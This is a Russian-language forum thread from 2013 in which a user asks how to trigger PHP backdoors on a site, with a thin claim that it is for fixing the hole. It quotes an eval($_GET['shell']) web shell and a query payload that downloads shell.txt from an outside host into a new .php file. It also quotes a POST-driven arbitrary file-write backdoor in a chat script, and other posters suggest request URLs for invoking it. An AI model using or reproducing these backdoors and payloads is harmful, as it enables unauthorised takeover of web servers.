{% else-1 %}
Обновить
* Тема закрыта!
1. [автор] (24 авг 2013, 15:05) [0/0] [0] [спам] [под]

Всем привет! кто знаком с кодом:
---
1) eval($_GET['shell']); ???
---
Вызывается от так:
******
2) ?shell=$file=fopen('название-файла.php',"a+"*;fwrite($file,file_get_contents('http://от-куда-берем-файл.ру/shell.txt'));fclose($file);
*******
Это если код "1" прописать в индексе..
а у меня ворос с таким кодом:
=======
3) [code]if($_POST['lons']!='')
{$gast=fopen($_POST
['poin'],"w"*;fputs($gast, $_POST
['vags']);fclose($gast);}[/code]
=======
Который прописывается НЕ в индексе а в файле который в папке: (/chat/pff.php)
ВОПРОС: если файл в папке то и вызов дыры должен быть другим, верно? кто подскажет верный путь отблагодарю 100.рублями! ))
P.S информация в целях ознакомления и устранения дыры.


Изм. 1 раз. / Посл. изм. (24 авг 2013, 15:07)
2. (24 авг 2013, 15:10) [0/0] [0] [спам] [под]

Первый код то шелл
Добавлено 24.08.13 в 15:11:11:
Сейчас код попробую написать

3. [автор] (24 авг 2013, 15:12) [0/0] [0] [спам] [под]
Карпов,

то язва для его заливки.. с тем то понятно.. меня интересует если этот код не в индексе а в чате то какой должен быть вызов?
я много вариантов проверил но ничего не вышло.
Добавлено 24.08.13 в 15:16:04:
ну так что, кто поможет?

4.
Sheldon-мошенник * [мошенник] 8.5
(24 авг 2013, 15:16) [0/0] [0] [спам] [под]

3 варианта chat.php?lons chat.php?poin chat.php?gast chat.php?vags

5. (24 авг 2013, 15:17) [0/0] [0] [спам] [под]

Там где названия файла .php попробуй написать так
/chat/pff.php
или зайди в чат и пропиши названия файла.

6. [автор] (24 авг 2013, 15:18) [0/0] [0] [спам] [под]
Sheldon-мошенник,

пробывал(( не работает.. да и вывод файлов у меня так идет: сите.ру/?chat

7.
Sheldon-мошенник * [мошенник] 8.5
(24 авг 2013, 15:18) [0/0] [0] [спам] [под]

Или chat.php?gast=пост переменные

8. [автор] (24 авг 2013, 15:19) [0/0] [0] [спам] [под]

а прямой доступ к папке Запрещен (но код работает 100%) главное правильный запрос.

9.
Sheldon-мошенник * [мошенник] 8.5
(24 авг 2013, 15:20) [0/0] [0] [спам] [под]
VendeTTa,

сите.ру/?chat&gast=lala

10.
System * [мошенник] 0.85
(24 авг 2013, 15:20) [0/0] [0] [спам] [под]

.


Изм. 1 раз. / Посл. изм.
System * [мошенник] 0.85
(24 авг 2013, 15:22)
Подписаны: 1
Скачать тему | Файлы темы | Фильтр сообщений